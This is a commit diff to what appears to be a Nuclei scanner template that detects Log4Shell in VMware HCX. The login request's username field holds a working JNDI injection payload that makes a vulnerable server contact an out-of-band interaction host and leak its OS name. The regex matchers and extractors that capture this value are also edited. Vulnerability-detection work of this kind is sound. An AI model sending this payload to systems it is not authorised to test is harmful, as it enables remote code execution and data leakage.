Update vmware-hcx-log4j.yaml
parent
d86e98c6a7
commit
481bd34fed
|
@ -26,7 +26,7 @@ requests:
|
|||
|
||||
{
|
||||
"authType": "password",
|
||||
"username": "${jndi:ldap://${hostName}.{{interactsh-url}}}",
|
||||
"username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}",
|
||||
"password": "admin"
|
||||
}
|
||||
|
||||
|
@ -40,15 +40,14 @@ requests:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
||||
|
|
Loading…
Reference in New Issue